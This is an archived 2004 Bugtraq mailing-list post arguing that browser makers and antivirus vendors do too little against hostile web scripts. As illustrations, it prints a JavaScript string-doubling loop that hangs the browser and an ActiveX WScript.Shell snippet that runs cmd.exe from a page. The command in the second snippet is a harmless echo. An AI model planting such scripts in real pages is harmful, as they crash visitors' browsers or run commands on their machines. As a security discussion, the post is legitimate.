lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040409150651.28078.qmail@search.securityfocus.com>
Date: 9 Apr 2004 15:06:51 -0000
From: Bipin Gautam <visitbipin@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Browser bugs [DoS] ... where will you draw a line?




Browser bugs [DoS] ... where will you draw a line?

Shouldn't developers [of Browsers] draw a line... between a DoS bug and a "can be troublesome" feature in their web-browsern and put necessary measures in their code to protect form such nasty codes.  These days... I’ve been seeing lot of stupid IE/Mozilla DoS exploits. They do get patched. Should we need another "Bloodhound" technology in brouser as well for such  but...... it's strange to see neither neither a antivirus softwares nor IE / MOZILLA are putting necessary efforts in their code to prevent such hostile scripts.....? 

------------
<body onload="hUNT()">
&lt;script language="JavaScript"><!--
var szhUNT="...cauz its a jungle out there!"
function hUNT()
{szhUNT=szhUNT + szhUNT
window.status="String Length is: "+szhUNT.length
window.setTimeout('hUNT()',1);}
// -->&lt;/script&gt;
-------------

OR 

you could just have a scripts that kicks a infinite pop up windows!!! or at worst...... lets add a WSH script...

--------------------------------------
I guess this bug has patch…
--------------------------------------
&lt;object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'>&lt;/object&gt;
&lt;script&gt;
wsh.Run("cmd.exe /k echo ...today is your lucky day!"); 
&lt;/script&gt; 
--------------------------------------

... such browser features are far *MORE* troublesome than *any* browser DoS BUGS!!!

the solution shouldn't be to disable scripting...... etc!

so ??????

./hUNT3R
-------------------------------------
http://www.geocities.com/visitbipin
http://www.01security.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ